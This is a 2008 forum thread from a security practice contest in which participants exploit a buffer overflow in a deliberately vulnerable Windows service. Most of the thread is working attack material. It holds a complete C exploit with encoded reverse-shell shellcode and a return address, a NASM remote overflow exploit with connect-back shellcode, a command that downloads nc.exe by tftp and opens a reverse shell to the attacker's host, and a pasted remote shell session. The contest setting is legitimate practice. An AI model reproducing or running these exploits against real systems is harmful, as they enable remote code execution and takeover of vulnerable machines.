Security practice (contest)

h57xiucj2z946q · 24-07-2008 10:14pm

No the server is up till saturday.

Martyr · 24-07-2008 10:19pm

Great! i'll still have a go before then.

h57xiucj2z946q · 25-07-2008 9:37am

yup give it a lash

Martyr · 25-07-2008 10:24am

is the port still open?
in an internet cafe, maybe they have it blocked here.

h57xiucj2z946q · 25-07-2008 10:28am

it should be, but its conceited that's hosting it.

Martyr · 25-07-2008 10:30am

ok, i can't access it from here anyway..

tested my code on winxp sp3 32-bit + winxp 64-bit, and both worked fine, i'm guessing it will work fine on win2k sp4 too..

couldn't test this on win2k, had an old laptop with it installed which died on me durin the week.

h57xiucj2z946q · 25-07-2008 10:39am

if your doing the same method as me, then your return address is all that needs to be changed for win2k sp4

Martyr · 25-07-2008 11:31pm

just connected from a different place, can you check the administrators desktop? because the assembly code only executes a command creating sec_practice.txt

if your doing the same method as me, then your return address is all that needs to be changed for win2k sp4

i'm using address that *should* be the same on all operating systems (except code uses PEB, so obviously won't work on 9x/NT) but i still haven't tested + confirmed it to work on win2k.

exploit sent, so let me know if it worked or not..if not, thats all i'm doin.

conceited · 26-07-2008 12:40am

Hi Joe ,

I just had a look at the server and nothing new is on the desktop unfortunately.

Martyr · 26-07-2008 12:46am

hmm, well what time is the server being taken down?
i might still have time to re-install win2k on another computer..

conceited · 26-07-2008 12:51am

Plenty of time Joe,Sometime tomorrow evening.

Martyr · 26-07-2008 1:35am

i just tested my code on win2k sp4 with same address used on win xp 32+64 bit versions - it worked fine...dont know what the problem is.maybe i'll run it again.

conceited · 26-07-2008 1:38am

I'll keep an eye out. Hope it works.

Martyr · 26-07-2008 4:48am

its down now.

conceited · 26-07-2008 5:01am

It was the speed increase tonight from eircom .
Sorry about that.:pac:

Martyr · 26-07-2008 5:13am

the code i send is working but for some reason interrupted.

Martyr · 26-07-2008 12:10pm

wrote another bit of code that spawned reverse shell, tested on win2k sp4/winxp sp2/sp3 32 + sp1 64 bit...all worked fine, multiple times.

Tried on conceited.homeunix.org - fails, a connection is made to the computer i'm on, but it immediately disconnects, same thing happened with the first code that executed a command.

the funny thing is, the connection is made some 5-6 seconds after the exploit is sent..why? would like to know..

So, i install fire daemon thinking its something to do with that.
Run it again on all systems, my codes work fine, so whats the problem?

all the codes i wrote and tested locally worked fine, its only when trying against conceited.homeunix.org that the connection gets dropped for some bizarre reason, in all situations..i've no idea why.

Damo can you detail how you exploited this? i can't finish this challenge, not sure anyone else will today if server comes down.

tbh, would try again, but not writing anymore code, because it always worked for me locally, unless its problem with router configuration..i don't know.

EDIT:
I just got a chance to test my code on Vista and it worked.

so thats:

WinXP SP2 32-bit - working
WinXP SP3 32-bit - working
Win2K SP4 32-bit - working
WinXP SP1 64-bit - working
Vista SP1 32-bit - working

All using the same return address..

but just not working on your server conceited!

conceited · 26-07-2008 1:45pm

Hey Joe,

Theres multiple files on the desktop .The router is fine nothing has changed. The files are all called TFTP1396 tft91393 there's 6 in total.
They start with the bytes Mz and have rdata .text so it's some sort exe.

Let me know if you need me to send one of them files.

Martyr · 26-07-2008 1:53pm

no, these are just error logs from tftp
the first code i wrote executed any command..what i wanted was easy way to get reverse shell.so the command was:

cmd /c tftp -i my_host_ip get nc.exe c:\nc.exe && cmd /c C:\nc.exe my_host_ip 80 -ecmd

on my computer:

nc -vLp80

and also a tftp server waiting for the connection..
the connection happens, but its dropped straight away..

conceited · 26-07-2008 2:04pm

Do you want me to send one of them over?
I've never seen an error log starting with bytes MZ before.
Perhaps it's your side thats the problem?

Your code is to complicated for me .I've never seen anything to load windows apis like that if thats what your doing.

Martyr · 26-07-2008 2:09pm

sure, zip/email it to me <snip>
i'll send you the program that i'm using to get the reverse shell locally, you can test yourself to see if it works or not.

possibly it is error on my side with router configuration..but the NAT entry seemed to be working fine.

conceited · 26-07-2008 2:24pm

tftp is udp maybe thats the problem.I'll send on the file.

Martyr · 26-07-2008 2:30pm

tftp is udp maybe thats the problem.

it worked for me locally, remotely..no idea what goes wrong.
i can see the connection made to the tftp server, then it just says that the peer dropped the connection. *shrug*

thats even when seccontest.exe is sleeping for 65 seconds

conceited · 26-07-2008 2:30pm

Tell me what port to open for tftp and I'll try that.That has to be it as you said the error logs are left on the desktop where your code is running.
:pac:Thats the problem alright has to be

conceited · 26-07-2008 2:35pm

I sent the email.Sleeping for 65 seconds, jesus what are ya doing that for

Martyr · 26-07-2008 2:37pm

you don't have to open any ports for it.
when i send the command, the buffer over-run in seccontest.exe executes the command locally.

so tftp connects to my ip address running the tftp server..this does happen, but for some reason the connection is immediately dropped.

in the case of reverse shell, same problem, your server connects to my ip address, but immediately drops the connection.

maybe it is the router at my end, don't know..its strange

Martyr · 26-07-2008 2:44pm

the files you found are temporarily created by tftp when downloading a file, but its of course when the transfer isn't completed..i said "error logs" but they're result of transfer error.

is it possible you're running some anti-virus scanner or host intrusion protection software that might close the connection if it detects something malicious?

conceited · 26-07-2008 2:46pm

Your right.I wasn't thinking about the local part.Pitty damo isn't here to have a chat with you.Everything on my side looks ok

Martyr · 26-07-2008 2:47pm

correction! just had somebody else online try it using the program i wrote, seems that it works!

C:\PROVA>nc -vLp80
listening on [any] 80 ...
connect to [192.168.1.2] from 86-41-130-98.b-ras1.chf.cork.eircom.net [86.41.13
.98] 52864

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Documents and Settings\damos challenge\Desktop>
C:\Documents and Settings\damos challenge\Desktop>


C:\Documents and Settings\damos challenge\Desktop>

C:\Documents and Settings\damos challenge\Desktop>
C:\Documents and Settings\damos challenge\Desktop>DIR
DIR
Volume in drive C has no label.
Volume Serial Number is 4400-546B

Directory of C:\Documents and Settings\damos challenge\Desktop

07/26/2008  01:40p      <DIR>          .
07/26/2008  01:40p      <DIR>          ..
07/19/2008  07:28p               1,251 cmd.lnk
07/20/2008  02:16p                   8 Damo.txt
07/19/2008  07:52p                 675 FireDaemon Pro Service Manager.lnk
07/19/2008  03:33p                 995 intro.txt
07/19/2008  03:07p              12,288 seccontest.exe
07/26/2008  06:54a                 512 TFTP1184
07/26/2008  06:56a                 512 TFTP1232
07/26/2008  05:17a                 512 TFTP1336
07/26/2008  05:12a                 512 TFTP1396
07/26/2008  06:57a                 512 TFTP1608
07/19/2008  07:31p         135,477,136 W2KSP4_EN.EXE
             11 File(s)    135,494,913 bytes
              2 Dir(s)  133,264,781,312 bytes free

C:\Documents and Settings\damos challenge\Desktop>cat
cat
'cat' is not recognized as an internal or external command,
operable program or batch file.

C:\Documents and Settings\damos challenge\Desktop>type damo.txt
type damo.txt
Yo :)

C:\Documents and Settings\damos challenge\Desktop>exit
exit
listening on [192.168.1.2] 80 ...

must be a problem with the router or virus scanner at my end...

conceited · 26-07-2008 2:57pm

Ah thats the job Joe.You'd of have it finished ages ago only for that so.Must of been very irritating I'd say.Glad you got confirmation .:)

Martyr · 26-07-2008 2:59pm

LOL it was fckin nightmare..

i still can't run it from here, the only internet i have at moment is actually 3g phone and theres no way to get reverse shell through it..so i'm just happy it worked after all that crap.

conceited · 26-07-2008 3:08pm

3g lovely

Glad you got it anyway .

h57xiucj2z946q · 26-07-2008 3:50pm

sorry for the delay in reply's. Well done Average Joe, also if your using a 3g phone, chances are you dont have a unique ip to connect back to so you can't have an incomming connection on a socket, especially on 3 IRl, they have about 4 ip's shared for all their internet users.

Since its saturday, my code (c) is:

#include <stdio.h>
#include "winsock2.h"

char shellcode[] =
"\x2b\xc9\x83\xe9\xb8\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xcf"
"\xfd\x4a\x2d\x83\xee\xfc\xe2\xf4\x33\x97\xa1\x60\x27\x04\xb5\xd2"
"\x30\x9d\xc1\x41\xeb\xd9\xc1\x68\xf3\x76\x36\x28\xb7\xfc\xa5\xa6"
"\x80\xe5\xc1\x72\xef\xfc\xa1\x64\x44\xc9\xc1\x2c\x21\xcc\x8a\xb4"
"\x63\x79\x8a\x59\xc8\x3c\x80\x20\xce\x3f\xa1\xd9\xf4\xa9\x6e\x05"
"\xba\x18\xc1\x72\xeb\xfc\xa1\x4b\x44\xf1\x01\xa6\x90\xe1\x4b\xc6"
"\xcc\xd1\xc1\xa4\xa3\xd9\x56\x4c\x0c\xcc\x91\x49\x44\xbe\x7a\xa6"
"\x8f\xf1\xc1\x5d\xd3\x50\xc1\x6d\xc7\xa3\x22\xa3\x81\xf3\xa6\x7d"
"\x30\x2b\x2c\x7e\xa9\x95\x79\x1f\xa7\x8a\x39\x1f\x90\xa9\xb5\xfd"
"\xa7\x36\xa7\xd1\xf4\xad\xb5\xfb\x90\x74\xaf\x4b\x4e\x10\x42\x2f"
"\x9a\x97\x48\xd2\x1f\x95\x93\x24\x3a\x50\x1d\xd2\x19\xae\x19\x7e"
"\x9c\xbe\x19\x6e\x9c\x02\x9a\x45"
"\xff\xff\xff\xff" // IP
"\xa9\x95"
"\xff\xff" // PORT
"\xa9\xae\xc3\xcc\x5a\x95\xa6\xd4\x65\x9d\x1d\xd2\x19\x97\x5a\x7c"
"\x9a\x02\x9a\x4b\xa5\x99\x2c\x45\xac\x90\x20\x7d\x96\xd4\x86\xa4"
"\x28\x97\x0e\xa4\x2d\xcc\x8a\xde\x65\x68\xc3\xd0\x31\xbf\x67\xd3"
"\x8d\xd1\xc7\x57\xf7\x56\xe1\x86\xa7\x8f\xb4\x9e\xd9\x02\x3f\x05"
"\x30\x2b\x11\x7a\x9d\xac\x1b\x7c\xa5\xfc\x1b\x7c\x9a\xac\xb5\xfd"
"\xa7\x50\x93\x28\x01\xae\xb5\xfb\xa5\x02\xb5\x1a\x30\x2d\x22\xca"
"\xb6\x3b\x33\xd2\xba\xf9\xb5\xfb\x30\x8a\xb6\xd2\x1f\x95\xba\xa7"
"\xcb\xa2\x19\xd2\x19\x02\x9a\x2d";

char jmp2esp[] = "\x29\x4c\xe1\x77"; /* Win 2k SP4 - user32.dll - jmp esp*/
/*char jmp2esp[] = "\xbb\xed\x4f\x7c"; /* Win 2k SP4 */
int sortshellcode(char *port, char *ip);

int main(int argc, char **argv) {

     if (argc < 4) {
        printf("Usage: &#37;s victim-ip victim-port your-ip your-port\n", argv[0]);
        exit(1);
     }

    // Initialize Winsock.
    WSADATA wsaData;
    int iResult = WSAStartup( MAKEWORD(2,2), &wsaData );
    if ( iResult != NO_ERROR )
        printf("Error at WSAStartup()\n");

    // Create a socket.
    SOCKET m_socket;
    m_socket = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );

    if ( m_socket == INVALID_SOCKET ) {
        printf( "Error at socket(): %ld\n", WSAGetLastError() );
        WSACleanup();
        return;
    }

    // Bind the socket.
    struct sockaddr_in service;

    service.sin_family = AF_INET;
    service.sin_addr.s_addr = inet_addr(argv[1]);
    service.sin_port = htons(atoi(argv[2]));

    if ( connect( m_socket, (SOCKADDR *) &service, sizeof(service) ) == SOCKET_ERROR ) {
        printf( "connect() failed.\n" );
        closesocket(m_socket);
        return;
    }

    sortshellcode(argv[4], argv[3]);

    char payload[1024];    
    memset(payload, 0x41, 528);                   //fill with A
    memcpy(payload+524,jmp2esp,strlen(jmp2esp));  //call esp
    memset(payload+529, 0x90, 10);                //nop sledge
    memcpy(payload+539,shellcode,strlen(shellcode)); //our shell code   

    // Send and receive data.

    send( m_socket, payload, strlen(payload), 0 );
    return;
}

int sortshellcode(char *port, char *ip)
{
    unsigned long xorip;
    unsigned short xorport;
    xorip = inet_addr(ip)^(unsigned long)0x2D4AFDCF;
    xorport = htons(atoi( port ))^(unsigned short)0x2D4A;
    memcpy ( &shellcode[184], &xorip, 4);
    memcpy ( &shellcode[190], &xorport, 2);
    return 0;
}

Martyr · 26-07-2008 4:24pm

cheers man, well done to yourself.not gonna add anything to that except to say that there was universal return address for all o/s + sp's.
here copied comments from source of code i wrote.

[php]
#define RETURN_ADDR 0x00401ACB

explanation of this address..
since strcpy() returns a pointer to the destination buffer in eax, all
we need to do is jmp eax or call eax and the exploit will in theory, work
on any operating system + service pack.

in the ___chkstk routine which is (ironically) meant to check the stack
for malicious modification, the following bit of code is all we need:

.text:00401ABD done:
.text:00401ABD sub ecx, eax
.text:00401ABF or dword ptr [ecx], 0
.text:00401AC2 mov eax, esp
.text:00401AC4 mov esp, ecx
.text:00401AC6 mov ecx, [eax]
.text:00401AC8 mov eax, [eax+4]
.text:00401ACB jmp eax ; <- universal address

so now the exploit should work on any system, since EXE files don't usually
contain relocation information, the address won't change.

bare in mind for the current asm_code, it requires PEB to lookup API, so
in this case, only win2k/win2k3/xp would work.

[/php]

i'll upload the asm codes i wrote for this later.
next contest please

conceited · 26-07-2008 4:40pm

Joe i am having some trouble getting the size of a stuc in nasm. In masm you can use the sizeof keyword.
Any ideas?

Martyr · 26-07-2008 6:02pm

no, sorry mate..

working with NASM is hard work

you could check out NASM32 which is sort-of a project like MASM32, but i've not tried it out.

Japheth has created some win32 include files you can use with MASM + his own JWASM which is a fork of MASM (still in early stages) i find it much easier to write assembly using those files.

don't really use nasm, indeed it was used for this challenge, but only because MASM wouldn't generate a binary file.

don't mean to rant, but NASM is a bit crap in some ways, ..just how it encodes immediate values/jump displacements..all are 32-bits and you can't explicitly tell it not to use 32-bits..and when using LEA this is unavoidable issue.

for example, in my first reverse connect asm code using MASM, i had:

[php]
mov dl,(@get_proc_address - @entrypoint)
lea ebp,[esp + edx] ; load address of our GetProcAddress
lea esi,[ebp + (@code_end - @get_proc_address)] ; load pointer to hashes
lea edi,[ebp + (@cmd_string - @get_proc_address) + 3] ; load cmd string
stosb
[/php]

but nasm was generating lots of null bytes + increasing the size, didn't have encoder for it..so it had to become:

[php]
mov dl, (@get_proc_address - @entry_point)
lea ebp, [esp + edx]

mov dl, (@code_end - @get_proc_address)
mov esi, ebp
add esi, edx

mov dl, (@cmd_string - @get_proc_address) + 3
mov edi, ebp
add edi, edx
stosb
[/php]

with push, you need to tell NASM its a byte and with jumps a short..etc, all this nonsense that most other assemblers simply do automatically for you.

also, in the latest version, it won't allow you to address segments which might not seem useful to many, but you can control alot in your code by being able to address FS,DS,ES explicitly.

its more hard work than it needs to be, so i'd recommend you check out MASM + Japheth's win32inc..or if you want to stick with NASM, search online for NASM32 package.

livewire2k · 29-07-2008 7:36pm

Nice work damo and Average Jo and conceited ok i didnt get this challegen done, i spend about a year cracking programs so i should of bn good with a debuger but i have it all forgoting! hey damo can u post a compiled version of ur app and maybe a guide to how it works, im getting errors when i try compile!

peace Livewire, looking fwd to the next challegen

h57xiucj2z946q · 30-07-2008 9:37am

Sorry i have been really busy all week. I compiled with dev-cpp, start a new c project and add the library "libwsock32.a". Then compile the c source.

Martyr · 31-07-2008 8:54pm

i might try write something over the weekend for the next contest if thats ok.

it'll probably involve solving a puzzle first rather than finding a vulnerability/writing exploit.

cryptography will be part of the puzzle, but it won't be so difficult you need a phd in mathematics to solve it.

conceited · 01-08-2008 10:10pm

Here's my code.
Finally got time today to finish it.
Socket programing was tough enough never did it before.
Looking forward to your one joe.

Thanks for the challenge DAmo I enjoyed that

[PHP]
;Connection

; 1. Initialize WSA – WSAStartup().
; 2. Create a socket – socket().
;3. Connect to the server – connect().
;4. Send data –send(),
;5. Disconnect – closesocket().

;compile with:
; NASMW.EXE -fobj buff.asm
;link with:
; ALINK.EXE buff.obj -c -oPE -subsys console

;^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^conceited@live.com

%include "D:\programming\nasm\include\windows.inc"

EXTERN __getmainargs
IMPORT __getmainargs Msvcrt.dll
EXTERN ExitProcess
IMPORT ExitProcess kernel32.dll
EXTERN GetCommandLineW
IMPORT GetCommandLineW kernel32.dll
EXTERN printf
IMPORT printf Msvcrt.dll
EXTERN CommandLineToArgvW
IMPORT CommandLineToArgvW Shell32.dll
EXTERN WSAStartup
IMPORT WSAStartup Ws2_32.dll
EXTERN WSAGetLastError
IMPORT WSAGetLastError Ws2_32.dll
EXTERN socket
IMPORT socket Ws2_32.dll
EXTERN htons
IMPORT htons Ws2_32.dll
EXTERN inet_addr
IMPORT inet_addr Ws2_32.dll
EXTERN closesocket
IMPORT closesocket Ws2_32.dll
EXTERN WSACleanup
IMPORT WSACleanup Ws2_32.dll
EXTERN connect
IMPORT connect Ws2_32.dll
EXTERN send
IMPORT send Ws2_32.dll
EXTERN recv
IMPORT recv Ws2_32.dll
EXTERN strtol
IMPORT strtol Msvcrt.dll
EXTERN ExitProcess
IMPORT ExitProcess kernel32.dll
EXTERN memcpy
IMPORT memcpy Msvcrt.dll

STRUC WSADATA
wVersion resw 1
wHighVersion resw 1
szDescription resb 256+1
szSystemStatus resb 128+1
iMaxSockets resw 1
iMaxUdpDg resw 1
lpVendorInfo resw 1
ENDSTRUC

STRUC SOCKADDR_IN
sin_family resw 1
sin_port resw 1
sin_addr resb 4
sin_zero resb 8
ENDSTRUC

segment .data USE32

CR equ 0Dh
LF equ 0Ah

wsaData dd WSADATA ; pointer to structure
sockAddr dd SOCKADDR_IN ; pointer to structure

msginitialized db "Winsock initialized...",CR,LF,0
msgconnected db "Connection sucessfull...",CR,LF,0
msgconnectionfailed db "Connection failed...",CR,LF,0
msgshellcodesent db "Shellcode sent...",CR,LF,0
msgsocketclosed db "Socket closed...",CR,LF,0
msgcleanedup db "",CR,LF,0

errCreateSock db "could not create socket.",CR,LF,0
errConnect db "could not connect.",CR,LF,0
errSend db "failed to send data.",CR,LF,0
errRead db "socket error while receiving.",CR,LF,0
errStartup db "startup failed!",CR,LF,0
errVersion db "required version not supported!",CR,LF,0
errCleanup db "cleanup failed!",CR,LF,0

strlogo db " ",CR,LF,CR,LF
db " (Remote buffer overflow exploit)",CR,LF
db "[conceited@live.com]",CR,LF,CR,LF
db "Usage: buff <victimip> <port> <attackerip> <port>]",CR,LF
db "Example:",CR,LF
db "buff.exe 142.143.112.12 1111 192.168.1.2 2222",CR,LF
db "

",CR,LF,0

retaddr db 0bbh,0edh,04fh,07ch ;call esp

;7c4fedbb
shellcode db 0fch,06ah,0ebh,04dh,0e8h,0f9h,0ffh,0ffh,0ffh,060h,08bh,06ch,024h,024h,08bh,045h,
db 03ch,08bh,07ch,005h,078h,001h,0efh,08bh,04fh,018h,08bh,05fh,020h,001h,0ebh,049h,
db 08bh,034h,08bh,001h,0eeh,031h,0c0h,099h,0ach,084h,00ch,074h,007h,0c1h,0cah,00dh,
db 001h,0c2h,0ebh,0f4h,03bh,054h,024h,028h,075h,0e5h,08bh,05fh,024h,001h,0ebh,066h,
db 08bh,00ch,04bh,08bh,05fh,01ch,001h,0ebh,003h,02ch,08bh,089h,06ch,024h,01ch,061h,
db 0c3h,031h,0dbh,064h,08bh,043h,030h,08bh,040h,00ch,08bh,070h,01ch,0adh,08bh,040h,
db 008h,05eh,068h,08eh,04eh,00eh,0ech,050h,0ffh,0d6h,066h,053h,066h,068h,033h,032h,
db 068h,077h,073h,032h,05fh,054h,0ffh,0d0h,068h,0cbh,0edh,0fch,03bh,050h,0ffh,0d6h,
db 05fh,089h,0e5h,066h,081h,0edh,008h,002h,055h,06ah,002h,0ffh,0d0h,068h,0d9h,009h,
db 0f5h,0adh,057h,0ffh,0d6h,053h,053h,053h,053h,043h,053h,043h,053h,0ffh,0d0h,068h,
db 01eh,01eh,01eh,01eh, ;ip 160 bytes to start of ip
db 066h,068h, ;2bytes
db 015h,0b3h, ;port ;2bytes
db 066h,053h,089h,0e1h,095h,068h,0ech,0f9h,;120bytes
db 0aah,060h,057h,0ffh,0d6h,06ah,010h,051h,055h,0ffh,0d0h,066h,06ah,064h,066h,068h,
db 063h,06dh,06ah,050h,059h,029h,0cch,089h,0e7h,06ah,044h,089h,0e2h,031h,0c0h,0f3h,
db 0aah,095h,089h,0fdh,0feh,042h,02dh,0feh,042h,02ch,08dh,07ah,038h,0abh,0abh,0abh,
db 068h,072h,0feh,0b3h,016h,0ffh,075h,028h,0ffh,0d6h,05bh,057h,052h,051h,051h,051h,
db 06ah,001h,051h,051h,055h,051h,0ffh,0d0h,068h,0adh,0d9h,005h,0ceh,053h,0ffh,0d6h,
db 06ah,0ffh,0ffh,037h,0ffh,0d0h,068h,0e7h,079h,0c6h,079h,0ffh,075h,004h,0ffh,0d6h,
db 0ffh,077h,0fch,0ffh,0d0h,068h,0f0h,08ah,004h,05fh,053h,0ffh,0d6h,0ffh,0d0h ;284bytes

segment .DATA? USE32

hSocket resd 1
temprecvbuff resb 512
argc dd 1
argv dd 255
env dd 1
srcip resb 16
dstip resb 16
srcport resw 2
dstport resw 2

resb WSADATA_size
junk times 1024 db 090h

segment .code USE32

..start

jmp start

_errormsg:
push dword ecx
call[printf]
add esp,4
jmp _finished

;

;startup code
;

start:
push dword 0
push dword env
push dword argv
push dword argc
call[__getmainargs]
add esp,16
cmp dword[argc],5
je sortinput

;

;print example
;

example:
push dword strlogo
call[printf]
add esp,4
jmp _finished

;

;sort and store ip port etc for later
;

sortinput:

;get targetip
mov esi,[argv]
add esi,4
mov edi,[esi]
mov [dstip],edi

nop
nop
nop

;get targetport
add esi,4
mov edi,[esi]
mov [dstport],edi
push dword 10

;get localip
add esi,4
mov edi,[esi]
mov [srcip],edi

;get localport
add esi,4
mov edi,[esi]
mov [srcport],edi

;

;initialize the winsock library
;

push dword wsaData
push dword 2
call [WSAStartup]
add esp,4
test eax,eax
jz _sockversion
mov ecx,errStartup
jmp _errormsg

;

;check winsock version
;

_sockversion:
cmp byte[wsaData+wVersion],2
jae __createsocket
mov ecx,errVersion
jmp _errormsg

;

;Create a socket
;

__createsocket:
push dword IPPROTO_TCP
push dword SOCK_STREAM
push dword AF_INET
call [socket]
cmp eax, INVALID_SOCKET
mov [hSocket],eax
jne _sockets_created
mov ecx,errCreateSock
jmp _errormsg

;

;fill in ip+port info before we connect
;

_sockets_created:
push dword msginitialized
call[printf]
add esp,4

mov[sockAddr+sin_family],dword AF_INET

push dword 10
push dword 0
push dword [dstport]
call[strtol]
mov [dstport],eax
add esp,12

push dword[dstport]
call[htons]
mov [sockAddr+sin_port],ax
push dword[dstip]
call [inet_addr]
mov [sockAddr+sin_addr],eax

;

;Connect to the server
;

push dword WSADATA_size
push dword sockAddr
push dword [hSocket]
call[connect]
test eax,eax
jz _getsomedata
mov ecx,errConnect
jmp _errormsg

;

;receive data
;

_getsomedata:

push dword msgconnected
call[printf]
add esp,4

push dword 0
push dword 1024
push dword temprecvbuff
push dword[hSocket]
call [recv]
cmp eax,SOCKET_ERROR
jne _displaydata
mov ecx,errRead
jmp _errormsg

;

;display the recieved data
;

_displaydata:
push dword temprecvbuff
call[printf]
;

;add together junk+rtnadd+nop+shellcode
;

push dword 4
push dword retaddr
push dword junk+524
call[memcpy]
add esp,12

push dword 4
push dword dstip
push dword shellcode+160
call[memcpy]
add esp,12

push dword 287
push dword shellcode
push dword junk+528
call[memcpy]
add esp,12

;

;send shellcode
;

_sendshellcode:
push dword 0
push dword 1024
push dword junk
push dword[hSocket]
call [send]

cmp eax,SOCKET_ERROR
jne _cleanup
mov ecx,errSend
jmp _errormsg

;

;close connection and clean up
;

_cleanup:
push dword msgshellcodesent
call[printf]
add esp,4

push dword[hSocket]
call[closesocket]

push dword msgsocketclosed
call[printf]
add esp,4

call[WSACleanup]

_finished:
xor eax,eax
call[ExitProcess]
[/PHP]

Martyr · 03-08-2008 8:22pm

Looking forward to your one joe.

didn't do anything i'm afraid..but i'll try do something durin week.

i was playing with f-secure challenge this weekend.
(would have mentioned but only found out about myself yesterday morning)

check them out, the first one is easy enough, the second can be solved in 2 ways, but i've not solved it yet.

well, it requires brute force of modified md5 hash, but i didn't know this and ran a normal md5 brute force attack for almost a day, testing ~500 million keys a second..now competition is over, but still good crackmes.

wish i had known about this contest earlier, but no doubt it'll be on again next year (this is third year now)

Byte22 · 16-09-2008 1:00pm

Would love to get into this stuff

h57xiucj2z946q · 17-09-2008 10:26am

I don't think there is enough interest for it here.

Security practice (contest)

Comments